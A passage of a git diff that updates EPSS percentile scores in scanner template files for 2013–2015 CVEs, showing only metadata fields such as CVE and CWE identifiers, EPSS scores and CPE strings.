cpe:2.3:a:wptrafficanalyzer:trafficanalyzer:1.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2013/CVE-2013-3827.yaml b/http/cves/2013/CVE-2013-3827.yaml index 9d820c0239..97e1444e54 100644 --- a/http/cves/2013/CVE-2013-3827.yaml +++ b/http/cves/2013/CVE-2013-3827.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2013-3827 cwe-id: NVD-CWE-noinfo epss-score: 0.67719 - epss-percentile: 0.97597 + epss-percentile: 0.976 cpe: cpe:2.3:a:oracle:fusion_middleware:2.1.1:*:*:*:*:*:*:* metadata: max-request: 10 diff --git a/http/cves/2013/CVE-2013-4117.yaml b/http/cves/2013/CVE-2013-4117.yaml index d33772d9a0..e48d69a706 100644 --- a/http/cves/2013/CVE-2013-4117.yaml +++ b/http/cves/2013/CVE-2013-4117.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2013-4117 cwe-id: CWE-79 epss-score: 0.01217 - epss-percentile: 0.83779 + epss-percentile: 0.83787 cpe: cpe:2.3:a:anshul_sharma:category-grid-view-gallery:2.3.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2013/CVE-2013-4625.yaml b/http/cves/2013/CVE-2013-4625.yaml index 97d4675c76..3a0742087c 100644 --- a/http/cves/2013/CVE-2013-4625.yaml +++ b/http/cves/2013/CVE-2013-4625.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2013-4625 cwe-id: CWE-79 epss-score: 0.01217 - epss-percentile: 0.83779 + epss-percentile: 0.83787 cpe: cpe:2.3:a:cory_lamle:duplicator:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2013/CVE-2013-5528.yaml b/http/cves/2013/CVE-2013-5528.yaml index fa919e7d39..fc9ae1d07d 100644 --- a/http/cves/2013/CVE-2013-5528.yaml +++ b/http/cves/2013/CVE-2013-5528.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2013-5528 cwe-id: CWE-22 epss-score: 0.00565 - epss-percentile: 0.75271 + epss-percentile: 0.75294 cpe: cpe:2.3:a:cisco:unified_communications_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2013/CVE-2013-5979.yaml b/http/cves/2013/CVE-2013-5979.yaml index 3a3ca8934f..d1657cb271 100644 --- a/http/cves/2013/CVE-2013-5979.yaml +++ b/http/cves/2013/CVE-2013-5979.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2013-5979 cwe-id: CWE-22 epss-score: 0.06969 - epss-percentile: 0.93203 + epss-percentile: 0.93207 cpe: cpe:2.3:a:springsignage:xibo:1.2.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2013/CVE-2013-6281.yaml b/http/cves/2013/CVE-2013-6281.yaml index 2f89fad433..4bc8f4c9d0 100644 --- a/http/cves/2013/CVE-2013-6281.yaml +++ b/http/cves/2013/CVE-2013-6281.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2013-6281 cwe-id: CWE-79 epss-score: 0.00209 - epss-percentile: 0.58698 + epss-percentile: 0.58728 cpe: cpe:2.3:a:dhtmlx:dhtmlxspreadsheet:2.0:-:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2013/CVE-2013-7240.yaml b/http/cves/2013/CVE-2013-7240.yaml index ed89ea8cdf..591e7b83f2 100644 --- a/http/cves/2013/CVE-2013-7240.yaml +++ b/http/cves/2013/CVE-2013-7240.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2013-7240 cwe-id: CWE-22 epss-score: 0.25635 - epss-percentile: 0.96159 + epss-percentile: 0.96162 cpe: cpe:2.3:a:westerndeal:advanced_dewplayer:1.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2013/CVE-2013-7285.yaml b/http/cves/2013/CVE-2013-7285.yaml index e194abb4c6..1a3a150e9b 100644 --- a/http/cves/2013/CVE-2013-7285.yaml +++ b/http/cves/2013/CVE-2013-7285.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2013-7285 cwe-id: CWE-78 epss-score: 0.33561 - epss-percentile: 0.96563 + epss-percentile: 0.96564 cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-10037.yaml b/http/cves/2014/CVE-2014-10037.yaml index 9f0026e3f1..bfc441dfe1 100644 --- a/http/cves/2014/CVE-2014-10037.yaml +++ b/http/cves/2014/CVE-2014-10037.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2014-10037 cwe-id: CWE-22 epss-score: 0.18676 - epss-percentile: 0.95656 + epss-percentile: 0.95659 cpe: cpe:2.3:a:domphp:domphp:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-1203.yaml b/http/cves/2014/CVE-2014-1203.yaml index 3f3147df4f..8174440d93 100644 --- a/http/cves/2014/CVE-2014-1203.yaml +++ b/http/cves/2014/CVE-2014-1203.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2014-1203 cwe-id: CWE-77 epss-score: 0.02045 - epss-percentile: 0.87748 + epss-percentile: 0.87754 cpe: cpe:2.3:a:eyou:eyou:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-2321.yaml b/http/cves/2014/CVE-2014-2321.yaml index f054ffca39..cb164f61fc 100644 --- a/http/cves/2014/CVE-2014-2321.yaml +++ b/http/cves/2014/CVE-2014-2321.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2014-2321 cwe-id: CWE-264 epss-score: 0.96364 - epss-percentile: 0.99399 + epss-percentile: 0.994 cpe: cpe:2.3:h:zte:f460:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-2383.yaml b/http/cves/2014/CVE-2014-2383.yaml index 0990157127..916c40616d 100644 --- a/http/cves/2014/CVE-2014-2383.yaml +++ b/http/cves/2014/CVE-2014-2383.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2014-2383 cwe-id: CWE-200 epss-score: 0.00723 - epss-percentile: 0.78525 + epss-percentile: 0.78537 cpe: cpe:2.3:a:dompdf:dompdf:*:beta3:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2014/CVE-2014-2908.yaml b/http/cves/2014/CVE-2014-2908.yaml index 88e270fbda..a5c6ea733c 100644 --- a/http/cves/2014/CVE-2014-2908.yaml +++ b/http/cves/2014/CVE-2014-2908.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2014-2908 cwe-id: CWE-79 epss-score: 0.00594 - epss-percentile: 0.75982 + epss-percentile: 0.76005 cpe: cpe:2.3:o:siemens:simatic_s7_cpu_1200_firmware:2.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-2962.yaml b/http/cves/2014/CVE-2014-2962.yaml index eabce9195c..19937a9e01 100644 --- a/http/cves/2014/CVE-2014-2962.yaml +++ b/http/cves/2014/CVE-2014-2962.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2014-2962 cwe-id: CWE-22 epss-score: 0.95825 - epss-percentile: 0.99251 + epss-percentile: 0.99252 cpe: cpe:2.3:o:belkin:n150_f9k1009_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-3120.yaml b/http/cves/2014/CVE-2014-3120.yaml index 9a6297d03a..9264dc1dc1 100644 --- a/http/cves/2014/CVE-2014-3120.yaml +++ b/http/cves/2014/CVE-2014-3120.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2014-3120 cwe-id: CWE-284 epss-score: 0.55248 - epss-percentile: 0.97271 + epss-percentile: 0.97272 cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-3206.yaml b/http/cves/2014/CVE-2014-3206.yaml index fc0fbaeebf..597adfa306 100644 --- a/http/cves/2014/CVE-2014-3206.yaml +++ b/http/cves/2014/CVE-2014-3206.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2014-3206 cwe-id: CWE-20 epss-score: 0.54379 - epss-percentile: 0.9725 + epss-percentile: 0.97252 cpe: cpe:2.3:o:seagate:blackarmor_nas_220_firmware:-:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2014/CVE-2014-3744.yaml b/http/cves/2014/CVE-2014-3744.yaml index 8203e2f0c7..bdc9149eb2 100644 --- a/http/cves/2014/CVE-2014-3744.yaml +++ b/http/cves/2014/CVE-2014-3744.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2014-3744 cwe-id: CWE-22 epss-score: 0.00672 - epss-percentile: 0.77563 + epss-percentile: 0.77583 cpe: cpe:2.3:a:nodejs:node.js:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-4210.yaml b/http/cves/2014/CVE-2014-4210.yaml index d4ac7823f4..7030b14827 100644 --- a/http/cves/2014/CVE-2014-4210.yaml +++ b/http/cves/2014/CVE-2014-4210.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2014-4210 cwe-id: NVD-CWE-noinfo epss-score: 0.96955 - epss-percentile: 0.99633 + epss-percentile: 0.99634 cpe: cpe:2.3:a:oracle:fusion_middleware:10.0.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-4513.yaml b/http/cves/2014/CVE-2014-4513.yaml index c423971723..d7ca384841 100644 --- a/http/cves/2014/CVE-2014-4513.yaml +++ b/http/cves/2014/CVE-2014-4513.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2014-4513 cwe-id: CWE-79 epss-score: 0.00145 - epss-percentile: 0.50181 + epss-percentile: 0.50203 cpe: cpe:2.3:a:activehelper:activehelper_livehelp_live_chat:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-4535.yaml b/http/cves/2014/CVE-2014-4535.yaml index 5dd0ef7e3f..883b85edc8 100644 --- a/http/cves/2014/CVE-2014-4535.yaml +++ b/http/cves/2014/CVE-2014-4535.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2014-4535 cwe-id: CWE-79 epss-score: 0.00135 - epss-percentile: 0.48508 + epss-percentile: 0.48521 cpe: cpe:2.3:a:import_legacy_media_project:import_legacy_media:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-4536.yaml b/http/cves/2014/CVE-2014-4536.yaml index b5ddffd904..18c87086d5 100644 --- a/http/cves/2014/CVE-2014-4536.yaml +++ b/http/cves/2014/CVE-2014-4536.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2014-4536 cwe-id: CWE-79 epss-score: 0.00149 - epss-percentile: 0.5078 + epss-percentile: 0.50806 cpe: cpe:2.3:a:katz:infusionsoft_gravity_forms:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-4539.yaml b/http/cves/2014/CVE-2014-4539.yaml index 10065a7eb6..b543901655 100644 --- a/http/cves/2014/CVE-2014-4539.yaml +++ b/http/cves/2014/CVE-2014-4539.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2014-4539 cwe-id: CWE-79 epss-score: 0.00135 - epss-percentile: 0.48508 + epss-percentile: 0.48521 cpe: cpe:2.3:a:movies_project:movies:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-4544.yaml b/http/cves/2014/CVE-2014-4544.yaml index 43d54394ad..32908ce616 100644 --- a/http/cves/2014/CVE-2014-4544.yaml +++ b/http/cves/2014/CVE-2014-4544.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2014-4544 cwe-id: CWE-79 epss-score: 0.00118 - epss-percentile: 0.45537 + epss-percentile: 0.45552 cpe: cpe:2.3:a:podcast_channels_project:podcast_channels:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-4550.yaml b/http/cves/2014/CVE-2014-4550.yaml index 0f2e0233fa..2a44028ff7 100644 --- a/http/cves/2014/CVE-2014-4550.yaml +++ b/http/cves/2014/CVE-2014-4550.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2014-4550 cwe-id: CWE-79 epss-score: 0.00135 - epss-percentile: 0.48508 + epss-percentile: 0.48521 cpe: cpe:2.3:a:visualshortcodes:ninja:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-4558.yaml b/http/cves/2014/CVE-2014-4558.yaml index a868b32e2c..d20fcbdc0e 100644 --- a/http/cves/2014/CVE-2014-4558.yaml +++ b/http/cves/2014/CVE-2014-4558.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2014-4558 cwe-id: CWE-79 epss-score: 0.00135 - epss-percentile: 0.48508 + epss-percentile: 0.48521 cpe: cpe:2.3:a:cybercompany:swipehq-payment-gateway-woocommerce:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-4561.yaml b/http/cves/2014/CVE-2014-4561.yaml index d3e7e1fd37..e5e77a37df 100644 --- a/http/cves/2014/CVE-2014-4561.yaml +++ b/http/cves/2014/CVE-2014-4561.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2014-4561 cwe-id: CWE-79 epss-score: 0.00098 - epss-percentile: 0.40499 + epss-percentile: 0.40522 cpe: cpe:2.3:a:ultimate-weather_project:ultimate-weather:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-4592.yaml b/http/cves/2014/CVE-2014-4592.yaml index c9dd2326e8..5b59fcac78 100644 --- a/http/cves/2014/CVE-2014-4592.yaml +++ b/http/cves/2014/CVE-2014-4592.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2014-4592 cwe-id: CWE-79 epss-score: 0.00135 - epss-percentile: 0.48508 + epss-percentile: 0.48521 cpe: cpe:2.3:a:czepol:wp-planet:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2014/CVE-2014-4940.yaml b/http/cves/2014/CVE-2014-4940.yaml index a5e7ef9ddd..f08de213bf 100644 --- a/http/cves/2014/CVE-2014-4940.yaml +++ b/http/cves/2014/CVE-2014-4940.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2014-4940 cwe-id: CWE-22 epss-score: 0.03891 - epss-percentile: 0.90941 + epss-percentile: 0.90945 cpe: cpe:2.3:a:tera_charts_plugin_project:tera-charts:0.1:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-4942.yaml b/http/cves/2014/CVE-2014-4942.yaml index 8ac1afddf6..2003aabe4c 100644 --- a/http/cves/2014/CVE-2014-4942.yaml +++ b/http/cves/2014/CVE-2014-4942.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2014-4942 cwe-id: CWE-200 epss-score: 0.01024 - epss-percentile: 0.82164 + epss-percentile: 0.82173 cpe: cpe:2.3:a:levelfourdevelopment:wp-easycart:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-5111.yaml b/http/cves/2014/CVE-2014-5111.yaml index 6ae938a2d2..370fb6e855 100644 --- a/http/cves/2014/CVE-2014-5111.yaml +++ b/http/cves/2014/CVE-2014-5111.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2014-5111 cwe-id: CWE-22 epss-score: 0.0445 - epss-percentile: 0.91458 + epss-percentile: 0.91468 cpe: cpe:2.3:a:netfortris:trixbox:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-5258.yaml b/http/cves/2014/CVE-2014-5258.yaml index d24036616f..1983df18ff 100644 --- a/http/cves/2014/CVE-2014-5258.yaml +++ b/http/cves/2014/CVE-2014-5258.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2014-5258 cwe-id: CWE-22 epss-score: 0.01386 - epss-percentile: 0.84905 + epss-percentile: 0.84911 cpe: cpe:2.3:a:webedition:webedition_cms:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-5368.yaml b/http/cves/2014/CVE-2014-5368.yaml index 13abe3f279..8fbb9436d9 100644 --- a/http/cves/2014/CVE-2014-5368.yaml +++ b/http/cves/2014/CVE-2014-5368.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2014-5368 cwe-id: CWE-22 epss-score: 0.09191 - epss-percentile: 0.94002 + epss-percentile: 0.94006 cpe: cpe:2.3:a:wp_content_source_control_project:wp_content_source_control:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-6308.yaml b/http/cves/2014/CVE-2014-6308.yaml index a8277d6458..9593054db8 100644 --- a/http/cves/2014/CVE-2014-6308.yaml +++ b/http/cves/2014/CVE-2014-6308.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2014-6308 cwe-id: CWE-22 epss-score: 0.0922 - epss-percentile: 0.94012 + epss-percentile: 0.94017 cpe: cpe:2.3:a:osclass:osclass:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-8676.yaml b/http/cves/2014/CVE-2014-8676.yaml index 323698ecff..6a782122a9 100644 --- a/http/cves/2014/CVE-2014-8676.yaml +++ b/http/cves/2014/CVE-2014-8676.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2014-8676 cwe-id: CWE-22 epss-score: 0.00195 - epss-percentile: 0.57202 + epss-percentile: 0.5723 cpe: cpe:2.3:a:soplanning:soplanning:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-8682.yaml b/http/cves/2014/CVE-2014-8682.yaml index 409884172d..54282b7c89 100644 --- a/http/cves/2014/CVE-2014-8682.yaml +++ b/http/cves/2014/CVE-2014-8682.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2014-8682 cwe-id: CWE-89 epss-score: 0.00808 - epss-percentile: 0.7985 + epss-percentile: 0.7986 cpe: cpe:2.3:a:gogits:gogs:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-8799.yaml b/http/cves/2014/CVE-2014-8799.yaml index 5d0036cba0..04533cb98f 100644 --- a/http/cves/2014/CVE-2014-8799.yaml +++ b/http/cves/2014/CVE-2014-8799.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2014-8799 cwe-id: CWE-22 epss-score: 0.17844 - epss-percentile: 0.95577 + epss-percentile: 0.9558 cpe: cpe:2.3:a:dukapress:dukapress:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-9094.yaml b/http/cves/2014/CVE-2014-9094.yaml index ae155eb474..1911c54d99 100644 --- a/http/cves/2014/CVE-2014-9094.yaml +++ b/http/cves/2014/CVE-2014-9094.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2014-9094 cwe-id: CWE-79 epss-score: 0.83554 - epss-percentile: 0.98096 + epss-percentile: 0.98098 cpe: cpe:2.3:a:digitalzoomstudio:video_gallery:-:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-9119.yaml b/http/cves/2014/CVE-2014-9119.yaml index c117173edf..961067c2d4 100644 --- a/http/cves/2014/CVE-2014-9119.yaml +++ b/http/cves/2014/CVE-2014-9119.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2014-9119 cwe-id: CWE-22 epss-score: 0.1414 - epss-percentile: 0.95081 + epss-percentile: 0.95084 cpe: cpe:2.3:a:db_backup_project:db_backup:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-9180.yaml b/http/cves/2014/CVE-2014-9180.yaml index a1b85ea46d..75a3b90ee3 100644 --- a/http/cves/2014/CVE-2014-9180.yaml +++ b/http/cves/2014/CVE-2014-9180.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2014-9180 cwe-id: CWE-601 epss-score: 0.00248 - epss-percentile: 0.62522 + epss-percentile: 0.62551 cpe: cpe:2.3:a:eleanor-cms:eleanor_cms:-:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2014/CVE-2014-9444.yaml b/http/cves/2014/CVE-2014-9444.yaml index 09d895c4d6..52f7b1ae06 100644 --- a/http/cves/2014/CVE-2014-9444.yaml +++ b/http/cves/2014/CVE-2014-9444.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2014-9444 cwe-id: CWE-79 epss-score: 0.00287 - epss-percentile: 0.65359 + epss-percentile: 0.65395 cpe: cpe:2.3:a:frontend_uploader_project:frontend_uploader:0.9.2:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-9606.yaml b/http/cves/2014/CVE-2014-9606.yaml index 74cc31c86b..5f3fd35d40 100644 --- a/http/cves/2014/CVE-2014-9606.yaml +++ b/http/cves/2014/CVE-2014-9606.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2014-9606 cwe-id: CWE-79 epss-score: 0.00102 - epss-percentile: 0.41398 + epss-percentile: 0.41422 cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-9607.yaml b/http/cves/2014/CVE-2014-9607.yaml index 5f4422cb64..cd711e0e09 100644 --- a/http/cves/2014/CVE-2014-9607.yaml +++ b/http/cves/2014/CVE-2014-9607.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2014-9607 cwe-id: CWE-79 epss-score: 0.00102 - epss-percentile: 0.41398 + epss-percentile: 0.41422 cpe: cpe:2.3:a:netsweeper:netsweeper:4.0.3:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-9608.yaml b/http/cves/2014/CVE-2014-9608.yaml index b99cb8c374..9a167aaafd 100644 --- a/http/cves/2014/CVE-2014-9608.yaml +++ b/http/cves/2014/CVE-2014-9608.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2014-9608 cwe-id: CWE-79 epss-score: 0.00102 - epss-percentile: 0.41398 + epss-percentile: 0.41422 cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-9609.yaml b/http/cves/2014/CVE-2014-9609.yaml index efda94b4dc..b496f81419 100644 --- a/http/cves/2014/CVE-2014-9609.yaml +++ b/http/cves/2014/CVE-2014-9609.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2014-9609 cwe-id: CWE-22 epss-score: 0.00212 - epss-percentile: 0.58907 + epss-percentile: 0.58939 cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-9614.yaml b/http/cves/2014/CVE-2014-9614.yaml index 849800f1d0..c1f71d8b36 100644 --- a/http/cves/2014/CVE-2014-9614.yaml +++ b/http/cves/2014/CVE-2014-9614.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2014-9614 cwe-id: CWE-798 epss-score: 0.01433 - epss-percentile: 0.85129 + epss-percentile: 0.85136 cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-9615.yaml b/http/cves/2014/CVE-2014-9615.yaml index 9be77c02ef..5e08cf1618 100644 --- a/http/cves/2014/CVE-2014-9615.yaml +++ b/http/cves/2014/CVE-2014-9615.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2014-9615 cwe-id: CWE-79 epss-score: 0.00102 - epss-percentile: 0.41398 + epss-percentile: 0.41422 cpe: cpe:2.3:a:netsweeper:netsweeper:4.0.4:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-9617.yaml b/http/cves/2014/CVE-2014-9617.yaml index d13f52eac8..47a6b9b798 100644 --- a/http/cves/2014/CVE-2014-9617.yaml +++ b/http/cves/2014/CVE-2014-9617.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2014-9617 cwe-id: CWE-601 epss-score: 0.00109 - epss-percentile: 0.43783 + epss-percentile: 0.43807 cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-9618.yaml b/http/cves/2014/CVE-2014-9618.yaml index fe85754518..c6cf3f44cf 100644 --- a/http/cves/2014/CVE-2014-9618.yaml +++ b/http/cves/2014/CVE-2014-9618.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2014-9618 cwe-id: CWE-287 epss-score: 0.03433 - epss-percentile: 0.90402 + epss-percentile: 0.90408 cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-0554.yaml b/http/cves/2015/CVE-2015-0554.yaml index e3e930a31f..9f6adccd46 100644 --- a/http/cves/2015/CVE-2015-0554.yaml +++ b/http/cves/2015/CVE-2015-0554.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2015-0554 cwe-id: CWE-264 epss-score: 0.0196 - epss-percentile: 0.87431 + epss-percentile: 0.87438 cpe: cpe:2.3:o:adb:p.dga4001n_firmware:pdg_tef_sp_4.06l.6:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-1000005.yaml b/http/cves/2015/CVE-2015-1000005.yaml index aa714dc005..845a8ade03 100644 --- a/http/cves/2015/CVE-2015-1000005.yaml +++ b/http/cves/2015/CVE-2015-1000005.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2015-1000005 cwe-id: CWE-22 epss-score: 0.05243 - epss-percentile: 0.92154 + epss-percentile: 0.9216 cpe: cpe:2.3:a:candidate-application-form_project:candidate-application-form:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-1000010.yaml b/http/cves/2015/CVE-2015-1000010.yaml index 8700dea897..44106be76c 100644 --- a/http/cves/2015/CVE-2015-1000010.yaml +++ b/http/cves/2015/CVE-2015-1000010.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-1000010 cwe-id: CWE-284 epss-score: 0.03171 - epss-percentile: 0.90047 + epss-percentile: 0.90051 cpe: cpe:2.3:a:simple-image-manipulator_project:simple-image-manipulator:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-1000012.yaml b/http/cves/2015/CVE-2015-1000012.yaml index c72a5aa929..ceeafe27ee 100644 --- a/http/cves/2015/CVE-2015-1000012.yaml +++ b/http/cves/2015/CVE-2015-1000012.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2015-1000012 cwe-id: CWE-200 epss-score: 0.00773 - epss-percentile: 0.79318 + epss-percentile: 0.79327 cpe: cpe:2.3:a:mypixs_project:mypixs:0.3:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-1427.yaml b/http/cves/2015/CVE-2015-1427.yaml index ef53061f86..f7ca41576e 100644 --- a/http/cves/2015/CVE-2015-1427.yaml +++ b/http/cves/2015/CVE-2015-1427.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-1427 cwe-id: CWE-284 epss-score: 0.8674 - epss-percentile: 0.98246 + epss-percentile: 0.98247 cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2015/CVE-2015-1503.yaml b/http/cves/2015/CVE-2015-1503.yaml index 50355631d1..647386d033 100644 --- a/http/cves/2015/CVE-2015-1503.yaml +++ b/http/cves/2015/CVE-2015-1503.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2015-1503 cwe-id: CWE-22 epss-score: 0.93087 - epss-percentile: 0.98771 + epss-percentile: 0.98772 cpe: cpe:2.3:a:icewarp:mail_server:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2015/CVE-2015-1579.yaml b/http/cves/2015/CVE-2015-1579.yaml index 8f2ad673af..67ff17355c 100644 --- a/http/cves/2015/CVE-2015-1579.yaml +++ b/http/cves/2015/CVE-2015-1579.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2015-1579 cwe-id: CWE-22 epss-score: 0.92959 - epss-percentile: 0.98754 + epss-percentile: 0.98755 cpe: cpe:2.3:a:elegant_themes:divi:-:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2015/CVE-2015-1880.yaml b/http/cves/2015/CVE-2015-1880.yaml index bc5ef69213..801df8b598 100644 --- a/http/cves/2015/CVE-2015-1880.yaml +++ b/http/cves/2015/CVE-2015-1880.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2015-1880 cwe-id: CWE-79 epss-score: 0.00201 - epss-percentile: 0.57854 + epss-percentile: 0.57883 cpe: cpe:2.3:o:fortinet:fortios:5.2.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-2067.yaml b/http/cves/2015/CVE-2015-2067.yaml index 4343a459bd..560f62d558 100644 --- a/http/cves/2015/CVE-2015-2067.yaml +++ b/http/cves/2015/CVE-2015-2067.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2015-2067 cwe-id: CWE-22 epss-score: 0.01338 - epss-percentile: 0.8461 + epss-percentile: 0.84617 cpe: cpe:2.3:a:magmi_project:magmi:-:*:*:*:*:magento_server:*:* metadata: max-request: 1 diff --git a/http/cves/2015/CVE-2015-2068.yaml b/http/cves/2015/CVE-2015-2068.yaml index 8c83e8e578..079aafd4bf 